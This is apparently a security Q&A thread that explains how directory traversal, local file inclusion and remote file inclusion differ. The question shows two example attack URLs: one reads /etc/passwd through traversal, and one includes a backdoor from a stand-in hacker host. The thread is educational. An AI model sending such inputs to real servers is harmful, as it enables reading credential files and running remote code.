5

Based on this previous question, it seems like the difference between directory traversal and file inclusion is as follows:

Directory traversal

  • Improper validation of user input leads to read access of server resource.
  • Example: http://www.example.com?file=../../etc/passwd

File inclusion

  • Improper validation of user input leads to the loading of an external resource into the server and execution therein.
  • Example: http://www.example.com/vuln_page.php?file=http://www.hacker.com/backdoor

This link, however, describes these concepts using the words local file inclusion and remote file inclusion.

So, is the first example

  • directory traversal vs. file inclusion

the same as the second example

  • local file inclusion vs. remote file inclusion

i.e. LFI/RFI is just different terminology for the same thing?

Zach Valenta
  • 153
  • 1
  • 7

1 Answers1

5

Your confusion stems from your over-broad understanding of directory traversal.

Traversal means one can read from another directory. Not specifically that one can read a file.

LFI is reading a local file, either in the current working directory or, using traversal, a file in another directory.

RFI is including a file from an external source.

It is possible to have an LFI vulnerability without there being a directory traversal vulnerability (files local to the current context). And, technically, it is possible that there can be a traversal vulnerability that does not result in a LFI.

schroeder
  • 123,438
  • 55
  • 284
  • 319
  • "LFI is reading a local file" vs. "RFI is including a file" --> the atomic distinction I was looking for; cheers – Zach Valenta Dec 05 '17 at 19:27
  • @ZachValenta I might amend your statement that "LFI is reading a local file" vs. "RFI is reading a remote file". "Including" is merely a technical implementation of "reading". – schroeder Dec 05 '17 at 21:37